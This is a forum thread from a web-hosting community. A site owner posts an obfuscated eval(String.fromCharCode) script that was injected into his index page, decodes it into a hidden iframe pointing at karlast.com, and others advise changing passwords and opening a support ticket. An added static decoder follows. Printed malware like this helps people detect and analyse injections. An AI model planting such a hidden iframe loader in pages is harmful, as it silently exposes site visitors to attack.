Weird code injected into default page

Discussion in 'Getting started' started by scot, Jun 3, 2009.

Thread Status:
Threads that have been inactive for 5 years or longer are closed to further replies. Please start a new thread.
  1. After opening my new DASP account last week I replaced the default index.htm page with a very simple html page that only had my domain name centered on the page.

    Several days later I noticed a JavaScript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious JavaScript function in the body.

    The script was encoded as ASCII character codes as follows:

    Code:
    <script type="text/javascript">eval(String.fromCharCode
    (118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,
    104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,
    97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,
    97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,
    99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,
    114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,
    43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,
    116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,
    39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,
    52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,
    32,109,110,98,113,61,52,51,48,52,49,56,50,52))
    </script>
    I decoded the ASCII stream and it looks like this:

    Code:
    var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
    document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
    function gg6345(){var as3113=9+7544;} var mnbq=43041824
    Basically it is trying to redirect the browser to a site called "karlast.com". I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.

    How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).

    Thanks, Scott.
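
The manual decoding described in the post above can be done statically, without ever running the injected script. This is an added example, not part of the original thread: the function names are hypothetical, and the sample payload and its host (`example.invalid`) are constructed to mirror the structure of the posted script.

```javascript
// Added example: statically decode eval(String.fromCharCode(...)) injections.
// Nothing is eval'd; the payload is only converted back to text and inspected.

// Decode every String.fromCharCode(n,n,...) call found in a page's HTML.
function decodeCharCodeCalls(html) {
  const re = /String\.fromCharCode\s*\(\s*([\d\s,]+?)\s*\)/g;
  return Array.from(html.matchAll(re), m =>
    m[1].split(',').filter(n => n.trim() !== '')
      .map(n => String.fromCharCode(parseInt(n.trim(), 10))).join(''));
}

// Resolve the 'lit'+name+'lit' chain passed to document.write() using the
// simple `var name="value";` assignments, then collect any src="..." URLs.
function extractWrittenSrc(js) {
  const vars = new Map();
  for (const m of js.matchAll(/var\s+(\w+)\s*=\s*"([^"]*)"/g)) vars.set(m[1], m[2]);
  const urls = [];
  const writeRe = /document\.write\(((?:'[^']*'|"[^"]*"|[\w+\s])+)\)/g;
  for (const m of js.matchAll(writeRe)) {
    const tokens = m[1].match(/'[^']*'|"[^"]*"|\w+/g) || [];
    // Quoted tokens are literals; bare names are looked up (unknown -> empty).
    const text = tokens
      .map(t => (/^['"]/.test(t) ? t.slice(1, -1) : (vars.get(t) || '')))
      .join('');
    for (const s of text.matchAll(/src="([^"]*)"/g)) urls.push(s[1]);
  }
  return urls;
}

// Full pass over a page: decoded payloads -> URLs they would write into the DOM.
function analyze(html) {
  return decodeCharCodeCalls(html).flatMap(extractWrittenSrc);
}

// Constructed sample shaped like the injected script in the post; the host is
// a placeholder (example.invalid), not a value taken from the page.
const samplePayload =
  'var p1="exam";var p2="ple";var dot=".";var tld="invalid";var a="ifr";var s="htt";' +
  "document.write('<'+a+'ame sr'+'c=\"'+s+'p://'+p1+''+p2+''+dot+''+tld+'/'+" +
  "'\" wid'+'th=\"1\" h'+'eight=\"3\"></if'+'r'+'ame>');";
const sampleHtml =
  '<html><body><script type="text/javascript">eval(String.fromCharCode(' +
  Array.from(samplePayload, c => c.charCodeAt(0)).join(',') +
  '))</script></body></html>';

console.log(analyze(sampleHtml)); // [ 'http://example.invalid/' ]
```

Running `analyze` over every static file in a site's web root gives a quick list of pages carrying this style of hidden iframe and the hosts they point to.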
     
  2. mjp

    Scott, you may want to read this post. Unfortunately this kind of compromise is becoming more common.
     
  3. Bruce, DiscountASP.NET Staff

    Create a support ticket; we'll give you further instructions.
     
  4. I saw that post, but after scanning my system with 3 different spyware utilities I figured it couldn't be spyware. I'll change my password anyway.

    Thanks mjp.

    Bruce - just saw your post. Will do.
     